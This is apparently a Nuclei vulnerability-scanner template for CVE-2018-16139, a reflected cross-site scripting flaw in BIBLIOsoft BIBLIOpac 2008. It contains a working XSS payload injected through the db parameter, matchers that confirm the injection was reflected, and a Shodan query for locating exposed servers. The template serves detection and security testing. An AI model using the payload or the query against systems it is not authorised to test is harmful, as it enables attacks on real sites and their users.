45 lines
1.2 KiB
YAML
45 lines
1.2 KiB
YAML
id: CVE-2018-16139
|
|
|
|
info:
|
|
name: BIBLIOsoft BIBLIOpac 2008 - Cross-Site Scripting
|
|
author: atomiczsec
|
|
severity: medium
|
|
description: |
|
|
BIBLIOsoft BIBLIOpac 2008 contains a cross-site scripting vulnerability via the db or action parameter to bin/wxis.exe/bibliopac/, which allows a remote attacker to inject arbitrary web script or HTML.
|
|
reference:
|
|
- https://www.0x90.zone/web/xss/2019/02/01/XSS-Bibliosoft.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-16139
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2018-16139
|
|
cwe-id: CWE-79
|
|
metadata:
|
|
max-request: 1
|
|
shodan-query: title:"Bibliopac"
|
|
verified: "true"
|
|
tags: cve,cve2018,xss,bibliopac,bibliosoft
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db="><script>prompt(document.domain)</script>'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"><script>prompt(document.domain)</script>.xrf'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/09/14
|